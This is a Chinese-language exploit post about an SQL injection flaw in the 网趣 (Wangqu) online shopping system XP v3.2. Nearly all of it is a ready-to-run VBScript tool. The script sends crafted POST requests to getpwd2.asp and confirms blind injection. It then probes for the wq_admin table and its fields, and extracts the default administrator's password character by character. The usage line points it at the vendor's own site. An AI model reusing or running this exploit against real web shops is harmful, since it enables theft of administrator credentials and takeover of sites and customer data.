网趣购物系统XP 3.2注入漏洞
Author:Tr4c3[dot]126[dot]CoM
http://www.nspcn.org
http://www.tr4c3.com
漏洞成因同:
http://www.tr4c3.com/post/220.html
网趣网上购物系统时尚版 v3.2注入漏洞
以官方为例演示:
'Code by [email protected]
On Error Resume Next
Dim strUrl,strRight
Set objArgs = WScript.Arguments
If objArgs.Count<>1 Then
WScript.Echo "网趣购物系统XP V3.2版 注入工具 By Tr4c3[at]126[dot]CoM"
WScript.Echo "用于默认配置的猜解,默认管理员admin,adminid=1"
WScript.Echo "Usage:Cscript getpass.vbs www.tr4c3.com"
WScript.Quit
Else
strUrl = "http://"&objArgs(0)&"/getpwd2.asp"
strFalse="注册" '特征字符
End If
'检查是否存在注入
If xPosts("username='+or+1=1+and+''='")=True And xPosts("username='+or+1=2+and+''='")=False Then
WScript.Echo "存在注入..."
Else
WScript.Echo "不存在注入..."
WScript.Quit
End if
'检查表
If xPosts("username='+or+0<>(select+count(*)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在wq_admin表..."
Else
WScript.Echo "不存在wq_admin表,退出!请手工校验。"
WScript.Quit
End if
'检查字段
If xPosts("username='+or+0<>(select+count(admin)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在字段admin..."
Else
WScript.Echo "不存在字段admin,退出!请手工校验。"
WScript.Quit
End If
If xPosts("username='+or+0<>(select+count(password)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在字段password,开始猜解密码..."
Else
WScript.Echo "不存在字段password,退出!请手工校验。"
WScript.Quit
End if
'猜测密码
pass = ""
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
For j = 1 To 16 Step 1
For k = 1 to len(strings) step 1
If xPosts("username='+or+(select+left(password,"&j&")+from+wq_admin+where+adminid=1)='"&pass&mid(strings,k,1)&"'+and+''='")=True Then
pass = pass & mid(strings,k,1)
exit For
End If
Next
Next
If error Then
WScript.Echo "error:" & Error.Description
Error.Clear
Else
WScript.Echo "Password=" & pass
Wscript.Quit
End If
'---------------------------------------------------------------------------------------
'Code by NP
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
'-----------------------------------------------------------------------------------------
Function xPosts(strSql)
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.open "POST",strUrl,False
xPost.setRequestHeader "Content-Type","Application/x-www-form-urlencoded"
xPost.send strSql
data=bytes2BSTR(xPost.responseBody)
If InStr(data,strFalse)=0 Then
xPosts=True
Else
xPosts=False
End if
End function